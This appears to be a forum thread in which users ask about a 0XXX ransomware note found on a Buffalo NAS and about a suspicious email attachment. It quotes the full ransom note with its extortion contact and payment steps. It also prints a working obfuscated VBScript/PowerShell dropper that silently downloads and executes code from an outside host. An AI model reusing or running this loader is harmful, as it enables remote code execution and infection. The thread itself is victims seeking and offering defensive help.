I was navigating through my NAS Buffalo LS-220de drives and found this on my 5TB drive...It only seemed to be on a specific date and time, Sept 8th 2022 @ 10:00PM to 10:11PM...Maybe 30 folders were affected..nothing big deal as I was able to rename and remove the extension...How did this happen...was it NAS specific All your files have been encrypted with 0XXX Virus. Your unique id: 166954F4D8B14F1A96F3287B35A78858 You can buy decryption for 300$USD in Bitcoins. To do this: 1) Send your unique id 166954F4D8B14F1A96F3287B35A78858 and max 3 files for test decryption to 08don_juan_1970689@mail.ru 2) After decryption, we will send you the decrypted files and a unique bitcoin wallet for payment. 3) After payment ransom for Bitcoin, we will send you a decryption program and instructions. If we can decrypt your files, we have no reason to deceive you after payment. Also after payment we will give you some tips to protect yourself from this in the future. FAQ: Can I get a discount? No. The ransom amount is calculated based on the number of encrypted office files and discounts are not provided. All such messages will be automatically ignored. What is Bitcoin? read bitcoin.org Where to buy bitcoins? hxxps://bitcoin.org/en/buy hxxps://buy.moonpay.io or use google.com Where is the guarantee that I will receive my files back? The very fact that we can decrypt your random files is a guarantee. It makes no sense for us to deceive you. Moreover, it would hurt our business. How quickly will I receive the key and decryption program after payment? As a rule, within a few minutes or hours, but very rarely there may be a delay of 1-2 days. How does the decryption program work? It's simple. You need to copy the key and select a folder to decrypt. The program will automatically decrypt all encrypted files in this folder and its subfolders.
there is some free decryption tool's, you can try search in google one fit to yours example's https://noransom.kaspersky.com/ https://www.avast.com/ransomware-decryption-tools#pc https://www.nomoreransom.org/en/decryption-tools.html https://www.emsisoft.com/ransomware-decryption/
It Really didnt do anything...I just removed the extensions and the files were fine...How did this happen? where did i get this?
@ABM Apparently the 0XXX ransomware sneaks in through open SMB ports in NAS or similar network connected devices. There is no working decryptor yet for this one. It could be possible that the ransomware can't encrypt certain file types (e.g. FLAC), hence you could simply change the extension to get the original files back. I suggest you to participate in the ongoing discussion on the Bleeping Computer forums and share your experience. Also, harden your network security and change the default SMB ports on the NAS.
Tito god morning, need help, yesterday i receive a mail with file.img attach, file.vbs inside, my wife open it, i can't find nothing about it, sorry & thanks Spoiler: code Set oProcess = GetObject("winmgmts:Win32_Process") Set objStartup = GetObject("winmgmts:Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 0 Set oInParams = oProcess.Methods_("Create"). _ InParameters.SpawnInstance_ oInParams.CommandLine = "Powershell " + mkwelld() + welllf() oInParams.ProcessStartupInformation = objConfig Set oOutParams = oProcess.ExecMethod_("Create", oInParams) Function mkwelld() mkwelld="$t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ct" End Function Function welllf() welllf="ion.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'h' + 'tt' + 'ps' + '://complexdental.hu/menu.txt')|P" End Function
you got very lucky the ransomware dont work on does NAS extension if not you would be f**ked now....best back all your data and secure you NAS ports lock it down as much as possible....is just a mater of time before the write malicious code that will encrypt does type of files.